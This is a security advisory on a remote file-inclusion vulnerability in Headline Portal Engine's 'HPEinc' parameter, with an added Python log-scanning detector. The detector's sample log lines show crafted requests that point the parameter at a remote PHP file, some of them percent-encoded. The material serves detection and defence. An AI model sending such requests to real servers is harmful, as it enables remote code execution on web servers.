Intrusion Prevention
Headline.Portal.Engine.HPEInc.File.Inclusion
Description
Headline Portal Engine (HPE) has multiple remote file-include vulnerabilities. By sending a specially crafted URL request to any of several script pages and using the 'HPEinc' parameter to specify a malicious PHP file on a remote system, a remote attacker could execute arbitrary scripts on the web server with the privileges of the server.
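A defender-side check for the request pattern described above, as an added example that is not part of the original advisory: it scans web-server access log lines for an 'HPEinc' value that points to a remote resource, including percent-encoded variants. The log format, script name and hosts are constructed placeholders, since the advisory does not name the affected scripts.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with a URL scheme or a protocol-relative "//" points off-host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)
PARAM = "hpeinc"  # parameter named in the advisory; compared case-insensitively


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) up to a bounded depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_include_value(log_line):
    """Return the decoded HPEinc value if it references a remote resource, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == PARAM:
            value = fully_decode(value)
            if REMOTE_RE.match(value):
                return value
    return None


# Constructed sample log lines; script names and hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /hpe/page.php?HPEinc=lib/ HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2007:10:00:05 +0000] "GET /hpe/page.php?HPEinc=http://remote.example/x.txt HTTP/1.1" 200 90',
    '192.0.2.12 - - [01/Jan/2007:10:00:09 +0000] "GET /hpe/page.php?hpeinc=%2568ttp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 90',
    '192.0.2.13 - - [01/Jan/2007:10:00:12 +0000] "GET /hpe/page.php?id=http://ok.example/ HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = remote_include_value(line)
        if hit:
            print("ALERT remote HPEinc value:", hit)
```

The check only sees parameters carried in the request URL, so values sent in a POST body need the same test applied wherever request bodies are logged or inspected.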
Affected Products
HPE version 0.6.1
HPE version 0.6.5
HPE version 0.7.0
HPE version 1.0
Impact
Gain Access.
Recommended Actions
Currently we are not aware of any vendor-supplied patches for this issue.
http://freshmeat.net/projects/hpe/